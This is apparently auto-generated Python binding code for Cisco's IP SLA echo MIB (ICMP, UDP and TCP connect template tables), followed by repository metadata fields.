('cipslaicmpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTimeOut'), ['int'])),
('cipslaicmpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaIcmpEchoTmplVerifyData'), ['bool'])),
('cipslaicmpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplReqDataSize'), ['int'])),
('cipslaicmpechotmpltos', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTOS'), ['int'])),
('cipslaicmpechotmplvrfname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplVrfName'), ['str'])),
('cipslaicmpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplThreshold'), ['int'])),
('cipslaicmpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistLives'), ['int'])),
('cipslaicmpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistBuckets'), ['int'])),
('cipslaicmpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter')])),
('cipslaicmpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplStatsHours'), ['int'])),
('cipslaicmpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistBuckets'), ['int'])),
('cipslaicmpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistInterval'), ['int'])),
('cipslaicmpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaicmpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaicmpechotmplname = None
self.cipslaicmpechotmpldescription = None
self.cipslaicmpechotmplsrcaddrtype = None
self.cipslaicmpechotmplsrcaddr = None
self.cipslaicmpechotmpltimeout = None
self.cipslaicmpechotmplverifydata = None
self.cipslaicmpechotmplreqdatasize = None
self.cipslaicmpechotmpltos = None
self.cipslaicmpechotmplvrfname = None
self.cipslaicmpechotmplthreshold = None
self.cipslaicmpechotmplhistlives = None
self.cipslaicmpechotmplhistbuckets = None
self.cipslaicmpechotmplhistfilter = None
self.cipslaicmpechotmplstatshours = None
self.cipslaicmpechotmpldistbuckets = None
self.cipslaicmpechotmpldistinterval = None
self.cipslaicmpechotmplstoragetype = None
self.cipslaicmpechotmplrowstatus = None
self._segment_path = lambda: "cipslaIcmpEchoTmplEntry" + "[cipslaIcmpEchoTmplName='" + str(self.cipslaicmpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaIcmpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, ['cipslaicmpechotmplname', 'cipslaicmpechotmpldescription', 'cipslaicmpechotmplsrcaddrtype', 'cipslaicmpechotmplsrcaddr', 'cipslaicmpechotmpltimeout', 'cipslaicmpechotmplverifydata', 'cipslaicmpechotmplreqdatasize', 'cipslaicmpechotmpltos', 'cipslaicmpechotmplvrfname', 'cipslaicmpechotmplthreshold', 'cipslaicmpechotmplhistlives', 'cipslaicmpechotmplhistbuckets', 'cipslaicmpechotmplhistfilter', 'cipslaicmpechotmplstatshours', 'cipslaicmpechotmpldistbuckets', 'cipslaicmpechotmpldistinterval', 'cipslaicmpechotmplstoragetype', 'cipslaicmpechotmplrowstatus'], name, value)
class CipslaIcmpEchoTmplHistFilter(Enum):
"""
CipslaIcmpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaIcmpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaUdpEchoTmplTable(Entity):
"""
A table that contains UDP echo template specific definitions.
.. attribute:: cipslaudpechotmplentry
A row entry representing an IPSLA UDP echo template
**type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, self).__init__()
self.yang_name = "cipslaUdpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaUdpEchoTmplEntry", ("cipslaudpechotmplentry", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaudpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaUdpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, [], name, value)
class CipslaUdpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA UDP echo template.
.. attribute:: cipslaudpechotmplname (key)
A string which specifies the UDP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaudpechotmpldescription
A string which provides description to the UDP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaudpechotmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslaudpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaudpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaudpechotmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslaudpechotmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaudpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaudpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 4..1500
**units**\: octets
.. attribute:: cipslaudpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaudpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing Table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaudpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaudpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaudpechotmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaudpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>`
.. attribute:: cipslaudpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaudpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaudpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaudpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaudpechotmplrowstatus
The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaUdpEchoTmplEntry"
self.yang_parent_name = "cipslaUdpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaudpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaudpechotmplname', (YLeaf(YType.str, 'cipslaUdpEchoTmplName'), ['str'])),
('cipslaudpechotmpldescription', (YLeaf(YType.str, 'cipslaUdpEchoTmplDescription'), ['str'])),
('cipslaudpechotmplcontrolenable', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplControlEnable'), ['bool'])),
('cipslaudpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaudpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaUdpEchoTmplSrcAddr'), ['str'])),
('cipslaudpechotmplsrcport', (YLeaf(YType.uint16, 'cipslaUdpEchoTmplSrcPort'), ['int'])),
('cipslaudpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTimeOut'), ['int'])),
('cipslaudpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplVerifyData'), ['bool'])),
('cipslaudpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplReqDataSize'), ['int'])),
('cipslaudpechotmpltos', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTOS'), ['int'])),
('cipslaudpechotmplvrfname', (YLeaf(YType.str, 'cipslaUdpEchoTmplVrfName'), ['str'])),
('cipslaudpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplThreshold'), ['int'])),
('cipslaudpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistLives'), ['int'])),
('cipslaudpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistBuckets'), ['int'])),
('cipslaudpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter')])),
('cipslaudpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplStatsHours'), ['int'])),
('cipslaudpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistBuckets'), ['int'])),
('cipslaudpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistInterval'), ['int'])),
('cipslaudpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaudpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaudpechotmplname = None
self.cipslaudpechotmpldescription = None
self.cipslaudpechotmplcontrolenable = None
self.cipslaudpechotmplsrcaddrtype = None
self.cipslaudpechotmplsrcaddr = None
self.cipslaudpechotmplsrcport = None
self.cipslaudpechotmpltimeout = None
self.cipslaudpechotmplverifydata = None
self.cipslaudpechotmplreqdatasize = None
self.cipslaudpechotmpltos = None
self.cipslaudpechotmplvrfname = None
self.cipslaudpechotmplthreshold = None
self.cipslaudpechotmplhistlives = None
self.cipslaudpechotmplhistbuckets = None
self.cipslaudpechotmplhistfilter = None
self.cipslaudpechotmplstatshours = None
self.cipslaudpechotmpldistbuckets = None
self.cipslaudpechotmpldistinterval = None
self.cipslaudpechotmplstoragetype = None
self.cipslaudpechotmplrowstatus = None
self._segment_path = lambda: "cipslaUdpEchoTmplEntry" + "[cipslaUdpEchoTmplName='" + str(self.cipslaudpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaUdpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, ['cipslaudpechotmplname', 'cipslaudpechotmpldescription', 'cipslaudpechotmplcontrolenable', 'cipslaudpechotmplsrcaddrtype', 'cipslaudpechotmplsrcaddr', 'cipslaudpechotmplsrcport', 'cipslaudpechotmpltimeout', 'cipslaudpechotmplverifydata', 'cipslaudpechotmplreqdatasize', 'cipslaudpechotmpltos', 'cipslaudpechotmplvrfname', 'cipslaudpechotmplthreshold', 'cipslaudpechotmplhistlives', 'cipslaudpechotmplhistbuckets', 'cipslaudpechotmplhistfilter', 'cipslaudpechotmplstatshours', 'cipslaudpechotmpldistbuckets', 'cipslaudpechotmpldistinterval', 'cipslaudpechotmplstoragetype', 'cipslaudpechotmplrowstatus'], name, value)
class CipslaUdpEchoTmplHistFilter(Enum):
"""
CipslaUdpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaUdpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaTcpConnTmplTable(Entity):
"""
A table that contains TCP connect template specific definitions.
.. attribute:: cipslatcpconntmplentry
A row entry representing an IPSLA TCP connect template
**type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, self).__init__()
self.yang_name = "cipslaTcpConnTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaTcpConnTmplEntry", ("cipslatcpconntmplentry", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry))])
self._leafs = OrderedDict()
self.cipslatcpconntmplentry = YList(self)
self._segment_path = lambda: "cipslaTcpConnTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, [], name, value)
class CipslaTcpConnTmplEntry(Entity):
"""
A row entry representing an IPSLA TCP connect template.
.. attribute:: cipslatcpconntmplname (key)
A string which specifies the TCP connect template name
**type**\: str
**length:** 1..64
.. attribute:: cipslatcpconntmpldescription
A string which provides description for the TCP connect template
**type**\: str
**length:** 0..128
.. attribute:: cipslatcpconntmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslatcpconntmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslatcpconntmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslatcpconntmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslatcpconntmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslatcpconntmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslatcpconntmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslatcpconntmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslatcpconntmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslatcpconntmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslatcpconntmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>`
.. attribute:: cipslatcpconntmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslatcpconntmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslatcpconntmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaTcpConnTmplDistBuckets = 5 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaTcpConnTmplDistBuckets = 1 buckets cipslaTcpConnTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslatcpconntmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslatcpconntmplrowstatus
The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, self).__init__()
self.yang_name = "cipslaTcpConnTmplEntry"
self.yang_parent_name = "cipslaTcpConnTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslatcpconntmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslatcpconntmplname', (YLeaf(YType.str, 'cipslaTcpConnTmplName'), ['str'])),
('cipslatcpconntmpldescription', (YLeaf(YType.str, 'cipslaTcpConnTmplDescription'), ['str'])),
('cipslatcpconntmplcontrolenable', (YLeaf(YType.boolean, 'cipslaTcpConnTmplControlEnable'), ['bool'])),
('cipslatcpconntmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslatcpconntmplsrcaddr', (YLeaf(YType.str, 'cipslaTcpConnTmplSrcAddr'), ['str'])),
('cipslatcpconntmplsrcport', (YLeaf(YType.uint16, 'cipslaTcpConnTmplSrcPort'), ['int'])),
('cipslatcpconntmpltimeout', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTimeOut'), ['int'])),
('cipslatcpconntmplverifydata', (YLeaf(YType.boolean, 'cipslaTcpConnTmplVerifyData'), ['bool'])),
('cipslatcpconntmpltos', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTOS'), ['int'])),
('cipslatcpconntmplthreshold', (YLeaf(YType.uint32, 'cipslaTcpConnTmplThreshold'), ['int'])),
('cipslatcpconntmplhistlives', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistLives'), ['int'])),
('cipslatcpconntmplhistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistBuckets'), ['int'])),
('cipslatcpconntmplhistfilter', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter')])),
('cipslatcpconntmplstatshours', (YLeaf(YType.uint32, 'cipslaTcpConnTmplStatsHours'), ['int'])),
('cipslatcpconntmpldistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistBuckets'), ['int'])),
('cipslatcpconntmpldistinterval', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistInterval'), ['int'])),
('cipslatcpconntmplstoragetype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslatcpconntmplrowstatus', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslatcpconntmplname = None
self.cipslatcpconntmpldescription = None
self.cipslatcpconntmplcontrolenable = None
self.cipslatcpconntmplsrcaddrtype = None
self.cipslatcpconntmplsrcaddr = None
self.cipslatcpconntmplsrcport = None
self.cipslatcpconntmpltimeout = None
self.cipslatcpconntmplverifydata = None
self.cipslatcpconntmpltos = None
self.cipslatcpconntmplthreshold = None
self.cipslatcpconntmplhistlives = None
self.cipslatcpconntmplhistbuckets = None
self.cipslatcpconntmplhistfilter = None
self.cipslatcpconntmplstatshours = None
self.cipslatcpconntmpldistbuckets = None
self.cipslatcpconntmpldistinterval = None
self.cipslatcpconntmplstoragetype = None
self.cipslatcpconntmplrowstatus = None
self._segment_path = lambda: "cipslaTcpConnTmplEntry" + "[cipslaTcpConnTmplName='" + str(self.cipslatcpconntmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaTcpConnTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, ['cipslatcpconntmplname', 'cipslatcpconntmpldescription', 'cipslatcpconntmplcontrolenable', 'cipslatcpconntmplsrcaddrtype', 'cipslatcpconntmplsrcaddr', 'cipslatcpconntmplsrcport', 'cipslatcpconntmpltimeout', 'cipslatcpconntmplverifydata', 'cipslatcpconntmpltos', 'cipslatcpconntmplthreshold', 'cipslatcpconntmplhistlives', 'cipslatcpconntmplhistbuckets', 'cipslatcpconntmplhistfilter', 'cipslatcpconntmplstatshours', 'cipslatcpconntmpldistbuckets', 'cipslatcpconntmpldistinterval', 'cipslatcpconntmplstoragetype', 'cipslatcpconntmplrowstatus'], name, value)
class CipslaTcpConnTmplHistFilter(Enum):
"""
CipslaTcpConnTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaTcpConnTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
def clone_ptr(self):
self._top_entity = CISCOIPSLAECHOMIB()
return self._top_entity
| 55.527293
| 720
| 0.624855
| 4,459
| 50,863
| 7.037901
| 0.099574
| 0.014531
| 0.017399
| 0.021127
| 0.579186
| 0.565961
| 0.548818
| 0.540724
| 0.524313
| 0.490918
| 0
| 0.012314
| 0.292708
| 50,863
| 915
| 721
| 55.587978
| 0.860014
| 0.463579
| 0
| 0.312268
| 0
| 0
| 0.321841
| 0.284763
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055762
| false
| 0
| 0.018587
| 0
| 0.122677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fea2c153f85345b8df258b2faf5084ce932ff128
| 4,057
|
py
|
Python
|
example/model-parallel/matrix_factorization/train.py
|
tkameyama/incubator-mxnet
|
47b0bdd00e7c5e1c9a448809b02e68c0e4b72e96
|
[
"Apache-2.0"
] | 1
|
2022-01-22T02:29:24.000Z
|
2022-01-22T02:29:24.000Z
|
example/model-parallel/matrix_factorization/train.py
|
tkameyama/incubator-mxnet
|
47b0bdd00e7c5e1c9a448809b02e68c0e4b72e96
|
[
"Apache-2.0"
] | null | null | null |
example/model-parallel/matrix_factorization/train.py
|
tkameyama/incubator-mxnet
|
47b0bdd00e7c5e1c9a448809b02e68c0e4b72e96
|
[
"Apache-2.0"
